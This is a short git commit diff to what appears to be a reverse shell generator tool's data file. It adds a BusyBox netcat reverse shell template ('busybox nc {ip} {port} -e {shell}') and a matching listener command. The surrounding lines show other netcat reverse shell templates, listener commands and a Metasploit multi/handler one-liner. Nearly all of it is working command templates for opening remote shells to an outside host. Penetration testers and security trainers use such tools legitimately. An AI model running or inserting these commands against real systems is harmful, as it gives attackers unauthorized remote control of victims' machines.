Added some busybox nc support. And added new shells.

This commit is contained in:
containedreality 2022-12-23 13:12:51 -05:00
parent 50ba01a738
commit 7572a719f7

View File

@ -60,6 +60,11 @@ const reverseShellCommands = withCommandType(
"command": "nc.exe {ip} {port} -e {shell}", "command": "nc.exe {ip} {port} -e {shell}",
"meta": ["windows"] "meta": ["windows"]
}, },
{
"name": "BusyBox nc -e",
"command": "busybox nc {ip} {port} -e {shell}",
"meta": ["linux"]
},
{ {
"name": "nc -c", "name": "nc -c",
"command": "nc -c {shell} {ip} {port}", "command": "nc -c {shell} {ip} {port}",
@ -455,6 +460,7 @@ const rsgData = {
listenerCommands: [ listenerCommands: [
['nc', 'nc -lvnp {port}'], ['nc', 'nc -lvnp {port}'],
['busybox nc', 'busybox nc -lp {port}'],
['ncat', 'ncat -lvnp {port}'], ['ncat', 'ncat -lvnp {port}'],
['ncat.exe', 'ncat.exe -lvnp {port}'], ['ncat.exe', 'ncat.exe -lvnp {port}'],
['ncat (TLS)', 'ncat --ssl -lvnp {port}'], ['ncat (TLS)', 'ncat --ssl -lvnp {port}'],
@ -469,7 +475,7 @@ const rsgData = {
['msfconsole', 'msfconsole -q -x "use multi/handler; set payload {payload}; set lhost {ip}; set lport {port}; exploit"'] ['msfconsole', 'msfconsole -q -x "use multi/handler; set payload {payload}; set lhost {ip}; set lport {port}; exploit"']
], ],
shells: ['sh', '/bin/sh', 'bash', '/bin/bash', 'cmd', 'powershell', 'pwsh', 'ash', 'bsh', 'csh', 'ksh', 'zsh', 'pdksh', 'tcsh'], shells: ['sh', '/bin/sh', 'bash', '/bin/bash', 'cmd', 'powershell', 'pwsh', 'ash', 'bsh', 'csh', 'ksh', 'zsh', 'pdksh', 'tcsh', 'mksh', 'dash'],
upgrade: ['python', ], upgrade: ['python', ],